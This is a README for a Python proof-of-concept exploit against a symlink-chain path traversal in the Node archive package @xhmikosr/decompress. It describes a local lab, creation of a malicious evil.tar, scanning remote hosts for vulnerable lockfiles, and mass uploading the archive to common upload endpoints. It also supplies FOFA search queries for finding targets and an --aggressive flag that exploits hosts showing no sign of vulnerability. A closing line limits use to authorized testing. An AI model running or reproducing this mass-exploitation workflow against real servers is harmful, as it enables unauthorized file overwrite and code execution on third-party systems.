
Python PoC for CVE-2026-101894: symlink-chain path traversal in @xhmikosr/decompress. Includes local Node lab, lockfile version scan, and mass evil.tar upload exploit.
Python 3 PoC for CVE-2026-101894 — Node.js archive extraction in @xhmikosr/decompress (and unmaintained decompress) allows read/write outside the output directory via a chain of symlink entries. Bypass of CVE-2026-53486 hardening. CVSS 3.1 9.1 Critical.
| PoCbit | https://pocbit.org/pocs/cve-2026-101894 |
| Catalog | https://pocbit.org/pocs/ |
| Package | @xhmikosr/decompress (maintained), decompress (kevva, unpatched) |
| API | Default decompress(input, output) |
| CWE | CWE-22 path traversal, CWE-59 link following |
| Fixed | 10.2.2 (10.x), 11.1.4 (11.x) |
| GHSA | GHSA-hrh2-vp3x-79xf |
decompress, tar/zip vb. arşivleri hedef klasöre açarken lexical path kontrolleri uygular; ancak ardışık symlink girdileri ile kernel, sonraki girdileri çıktı dizini dışında çözebilir. Saldırgan kontrollü arşivle config, startup script veya hassas dosyaların üzerine yazabilir / okuyabilir → RCE senaryosu (CI, container, upload+extract servisleri).
@xhmikosr/decompress için yama: 10.2.2 ve 11.1.4. Eski decompress paketi 4.2.1’e kadar aynı sınıfta ve yama almıyor — @xhmikosr/[email protected]+’e geçin.
| Mode | Purpose |
|---|---|
--lab | lab/ içinde 11.1.3 kurar, evil.tar symlink zinciri ile dışarı yazmayı doğrular |
--write-evil-tar | Payload arşivini diske yazar (POCBIT-101894-ESCAPED marker) |
check | Uzak hedefte package.json / lockfile → sürüm ≤ riskli mi? |
exploit | Symlink-chain evil.tar ile yaygın upload yollarına POST (mass bulk) |
| mass | --list + -j; hits.txt / exploited.txt |
Uzak exploit, sunucunun arşivi gerçekten decompress ile açtığını kanıtlamaz; 2xx upload kabulü + zayıf sürüm fingerprint’i exploited sayılır. Kesin kanıt için --lab.
hits.txt vs exploited.txt (sık görülen durum)| Aşama | Ne kanıtlar |
|---|---|
| check → hits.txt | /package.json veya /package-lock.json açık ve içinde zayıf decompress var |
| exploit → exploited.txt | PoC’nin denediği genel upload URL’lerinden en az biri HTTP 2xx döndü |
FOFA Express listesinde 500 scan → 2 hit normaldir. 2 hit + 0 exploit (vulnerable_dep_no_upload_endpoint) da normaldir: bağımlılık sızıntısı ≠ herkese açık arşiv upload. Bu CVE istismar için uygulamanın untrusted arşivi decompress() ile açması gerekir; HID / rastgele :8088 sitelerinde PoC’nin 8–11 varsayılan path’i çoğu zaman yoktur.
# Zincir kanıtı (lokal)
python poc.py --lab
# Hit’ler: sadece bağımlılık + upload denemesi
python poc.py --list hits.txt --mode exploit -j 2
# Beklenen: upload_ok=0, status vulnerable_dep_no_upload_endpoint
| Package | Vulnerable | Patched |
|---|---|---|
@xhmikosr/decompress 11.x | 11.0.0 – 11.1.3 | ≥ 11.1.4 |
@xhmikosr/decompress 10.x | < 10.2.2 | ≥ 10.2.2 |
decompress (kevva) | ≤ 4.2.1 | none — migrate |
cd CVE-2026-101894
pip install -r requirements.txt
Lab: Node.js + npm on PATH (Linux/macOS recommended for symlink extract behavior).
python poc.py --lab
python poc.py --write-evil-tar evil.tar
python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt
python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
| Flag | Meaning |
|---|---|
--lab | Local Node extraction PoC |
--aggressive | Exploit even without exposed vulnerable lockfile |
--upload-paths | Custom comma-separated POST paths |
--exploited-list | Targets where upload returned 2xx |
Symlink chain (simplified):
a/b/c/up → ../..a/b/escape → c/up/../..esc → ..…/pocbit_escape.txt with marker payloadMatches the symlink-chain bypass class described in 11.1.4 release notes (realpath / containment fix).
FOFA JSON → python _format_fofa.py fofa_results_1000.json
→ fofa_results_1000.json (url), fofa_results_1000.csv, fofa_targets_1000.txt
python poc.py --list fofa_targets_1000.txt --mode check -j 40 → hits.txt
python poc.py --list fofa_results_1000.csv --mode check -j 40 # url column
python poc.py --list hits.txt --mode exploit -j 8 --aggressive → exploited.txt
Upload/zip FOFA dork listesi (fofa_results_1000) exploit yüzeyi için Express-only 500 listesinden daha uygundur; yine de hit = lockfile + zayıf decompress, exploit = upload 2xx.
body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"
(Lockfile rarely public in prod; check often finds staging, CI artifacts, misconfigured static hosting.)
Test only systems you are authorized to assess. Do not upload malicious archives to third-party production services.
CVE-2026-101894 PoC: @xhmikosr/decompress symlink-chain archive path traversal (bypass CVE-2026-53486). Node lab + lockfile scan + mass evil.tar upload exploit. CVSS 9.1. https://pocbit.org/pocs/cve-2026-101894